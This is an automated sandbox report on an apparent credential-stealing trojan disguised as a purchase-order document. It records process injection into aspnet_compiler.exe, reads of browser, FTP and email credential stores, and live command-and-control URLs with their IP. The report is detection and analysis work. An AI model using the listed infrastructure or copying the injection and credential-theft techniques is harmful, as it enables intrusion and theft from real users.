            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory allocated: 1700000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe TID: 4932Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6392Thread sleep time: -540000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60000Jump to behavior
            Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.0000000004292000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
            Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.0000000004323000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
            Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.00000000041DA000.00000004.00000800.00020000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.00000000040FF000.00000004.00000800.00020000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.0000000004230000.00000004.00000800.00020000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.00000000043F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
            Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.000000000436A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
            Source: aspnet_compiler.exe, 00000002.00000002.2590229710.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: 0.2.(PO403810)_VOLEX_doc.exe.30f94d0.1.raw.unpack, BATMAN.csReference to suspicious API methods: WriteProcessMemory_API(processInformation.HasanHandle, num9 + 8, bytes, 4, ref bytesWritten)
            Source: 0.2.(PO403810)_VOLEX_doc.exe.30f94d0.1.raw.unpack, BATMAN.csReference to suspicious API methods: ReadProcessMemory_API(processInformation.HasanHandle, num9 + 8, ref buffer, 4, ref bytesWritten)
            Source: 0.2.(PO403810)_VOLEX_doc.exe.30f94d0.1.raw.unpack, BATMAN.csReference to suspicious API methods: VirtualAllocEx_API(processInformation.HasanHandle, 0, length, 12288, 64)
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000Jump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000Jump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000Jump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 9D5008Jump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeQueries volume information: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 720, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: PopPassword2_2_0040D069
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: SmtpPassword2_2_0040D069
            Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            2
            OS Credential Dumping
            11
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
            Process Injection
            1
            Disable or Modify Tools
            2
            Credentials in Registry
            31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol11
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            File and Directory Discovery
            SMB/Windows Admin Shares2
            Data from Local System
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS13
            System Information Discovery
            Distributed Component Object ModelInput Capture113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script311
            Process Injection
            LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Deobfuscate/Decode Files or Information
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            (PO403810)_VOLEX_doc.exe53%ReversingLabsWin32.Trojan.Leonem
            (PO403810)_VOLEX_doc.exe100%AviraTR/Dropper.MSIL.Gen
            (PO403810)_VOLEX_doc.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://alphastand.top/alien/fre.php100%Avira URL Cloudphishing
            http://alphastand.trade/alien/fre.php100%Avira URL Cloudmalware
            http://alphastand.win/alien/fre.php100%Avira URL Cloudphishing
            https://dddotx.shop/Mine/PWS/fre.php100%Avira URL Cloudmalware
            http://www.ibsensoftware.com/0%Avira URL Cloudsafe
            http://kbfvzoboss.bid/alien/fre.php100%Avira URL Cloudphishing
            http://dddotx.shop/Mine/PWS/fre.php100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            dddotx.shop
            188.114.97.3
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://dddotx.shop/Mine/PWS/fre.phptrue
              • Avira URL Cloud: malware
              unknown
              http://kbfvzoboss.bid/alien/fre.phptrue
              • Avira URL Cloud: phishing
              unknown
              http://alphastand.win/alien/fre.phptrue
              • Avira URL Cloud: phishing
              unknown
              http://alphastand.trade/alien/fre.phptrue
              • Avira URL Cloud: malware
              unknown
              http://alphastand.top/alien/fre.phptrue
              • Avira URL Cloud: phishing
              unknown
              http://dddotx.shop/Mine/PWS/fre.phptrue
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.ibsensoftware.com/aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              188.114.97.3
              dddotx.shopEuropean Union
              13335CLOUDFLARENETUStrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1517995
              Start date and time:2024-09-25 10:18:03 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 58s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:8
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:(PO403810)_VOLEX_doc.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/3@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 46
              • Number of non-executed functions: 6
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: (PO403810)_VOLEX_doc.exe
              TimeTypeDescription
              04:19:10API Interceptor135x Sleep call for process: aspnet_compiler.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.114.97.3QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
              • filetransfer.io/data-package/DiF66Hbf/download
              http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
              • easyantrim.pages.dev/id.html
              QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
              • filetransfer.io/data-package/13rSMZZi/download
              Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
              • www.rtpngk.xyz/yhsl/
              PO-001.exeGet hashmaliciousFormBookBrowse
              • www.x0x9x8x8x7x6.shop/assb/
              PO2024033194.exeGet hashmaliciousFormBookBrowse
              • www.cc101.pro/4hfb/
              ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
              • www.chinaen.org/zi4g/
              updater.exeGet hashmaliciousUnknownBrowse
              • microsoft-rage.world/Api/v3
              http://www.pro-pharma.co.ukGet hashmaliciousUnknownBrowse
              • proph.co.uk/blog/
              DHL documents_PDF.exeGet hashmaliciousFormBookBrowse
              • www.hindo.top/b31a/?xVJtG4Qx=NzSChTKNjjtA9oOpLl4rXJIvEV3PrPKyZnQBhjSYE3dzUwTxd/TkmyQCL+Cn4jVtP9cc&9rT=ndrxUr
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUShttps://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
              • 104.18.38.76
              LaWl4DY2kW.exeGet hashmaliciousLummaCBrowse
              • 104.21.37.97
              CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
              • 188.114.96.3
              AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
              • 188.114.97.9
              RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
              • 188.114.96.3
              ACeTKO93e9.exeGet hashmaliciousLummaCBrowse
              • 104.21.58.182
              LNGHLELNes.exeGet hashmaliciousLummaCBrowse
              • 172.67.188.74
              New_Document-660128863990.wsfGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              SKMBT_C22024082310420.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.97.3
              New_Document-660119928827.wsfGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              No context
              No context
              Process:C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):226
              Entropy (8bit):5.360398796477698
              Encrypted:false
              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
              MD5:3A8957C6382192B71471BD14359D0B12
              SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
              SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
              SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
              Malicious:true
              Reputation:high, very likely benign file
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview:1
              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              File Type:data
              Category:dropped
              Size (bytes):50
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3::
              MD5:871BDD96B159C14D15C8D97D9111E9C8
              SHA1:8CD537A621659C289F0707BAD94719B5782DDB1F
              SHA-256:CC2786E1F9910A9D811400EDCDDAF7075195F7A16B216DCBEFBA3BC7C4F2AE51
              SHA-512:E116D2D486BC802E99D5FFE83A666D5E324887A65965C7E0D90B238A4EE1DB97E28F59AED23E6F968868902D762DF06146833BE62064C4A74D7C9384DFB0C7F6
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:..................................................
              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):6.696683538828848
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              • Win32 Executable (generic) a (10002005/4) 49.78%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:(PO403810)_VOLEX_doc.exe
              File size:208'896 bytes
              MD5:aa2edba076823e2d67c52d3055a15e80
              SHA1:f8ab944af1bf067fcd7f6806311ccd98374d98cd
